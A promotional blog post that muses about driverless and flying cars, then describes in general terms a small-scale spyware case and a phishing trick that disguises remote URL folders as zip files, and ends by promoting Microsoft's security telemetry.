Futuristic Attack Vectors

We had a really interesting discussion in the office yesterday about trying to understand the future through the lens of today’s technology.

A few years ago I would have railed against the idea of not being in control of a car, but I think it’s approaching criticality to remove the distracted driver from the equation. And certainly the technology is very nearly there for mass-scale adoption of driverless technology. (Consider, for a moment, selling the concept of today’s road system to an insurance under-writer with no knowledge of cars: “we’re going to let minimally-trained operators pilot 4000 lb steel cocoons at up to 70mph. Those operators will have full control and the vehicles will require constant maintenance, but don’t worry: they’ll be separated by lines of paint.”)

The biggest impediment to driverless is likely not the occasional accident, but the combination of old cars and luddite drivers. But flying cars? Now that’s another thing, and one where I think the futurists may still be a bit off-base.

Have you seen the Mohler Sky-Car or any of its…competitors…in that “market”? We’ve had single- and dual-passenger planes for generations that are frankly more efficient than anything in the current “flying car” space, and I don’t see that changing for a long time. While flight-control systems can be automated easily enough, the range problem always comes back, as does the parking issue with necessarily-larger vehicles. Go ahead: change my mind. Show me a propulsion technology that doesn’t significantly contribute to mass (and therefore an exponential uptick in required fuel…and its associated mass) that can be mass-produced in a small-enough package to fit in a parking space.

In the meantime, I’ll muse on how that parallels with computer technology. Remember when quantum was “just a few years away” and was going to fundamentally change everything about computing? “I was promised quantum computers.” Go!

But while predicting some elements of future computing are extremely difficult, we do know that attacks on computing will continue, and attackers will constantly evolve and adapt their methodologies to system capabilities and protections.

A couple of new attack vectors hit the news this week, and both of them instantly shot me into the whole “tech futurist” mindset. The first one, while awful in its import, was elegant in its simplicity: re-use ancient code from known attacks of the 90’s, but target a small-enough set of users to not trigger “big data” sensors.

An attacker in Ohio distributed monitoring software that collected illicit webcam pics, web history, and even keystrokes from unsuspecting users. He’s going to prison, but was able to operate for months, if not years, by being very careful to not release his attacks into the mainstream.

The power of the cloud comes in its ability to use aggregate data to make intelligent decisions. This attack was largely ignored by traditional antivirus applications, even though it was using known malicious code. It’s speculation, but my guess is because that code was so old, it wasn’t being actively detected.

Funny story, though: have you heard of the “Bad Rabbit” attack from a while back? It was Russian malware that Windows Defender stopped cold within the first 15 detections. So even running the attack at a very small and targeted scale, with the right tools in place (and using the power of the world’s largest security sensor array), this guy could have gone from operating undetected for years to a much faster conviction.

The other attack that’s been making the rounds is also rather elegant in its simplicity: masquerading a URL-based folder as a .zip file, making Windows’ File Explorer browse files on a remote (malicious) server as though they were contained within a local trusted archive. From what I’ve seen, they’re mostly appearing as “you have voice mail” kinds of messages, but the intent is to get the user to execute a remote file directly in Windows—not even in the web browser.

What’s interesting here is that because the attachment has a URL extension, it’s incredibly easy to slip past email filters. And since the attacker owns the URL, even traditional methods that would check the destination at the time of delivery can be duped into believing that the destination is safe.

Cue a conversation around Office 365 Advanced Threat Detection, with time-of-click safe-link and safe-attachment detection, and it’s exceptionally unlikely that a user would be compromised within your environment.

But my point is not to sell you a specific tool for a specific attack. What I find fascinating in both of these attacks is that, while they’re using simple (and yet sophisticated) adaptations to account for an ever-evolving security landscape, they can be easily disrupted because somebody somewhere at Microsoft decided to take all the world’s Windows, Xbox, server, Azure, O365, and other telemetry to build an intelligent Security Graph that learns, adapts, and protects on the fly.

With the power of the Microsoft Graph backing my security solutions, I don’t have to be a security futurist. I can get back to important arguments about the range issue on flying cars and know that my corporate assets will receive best-in-class protections against both known and heretofore-unknown attack vectors.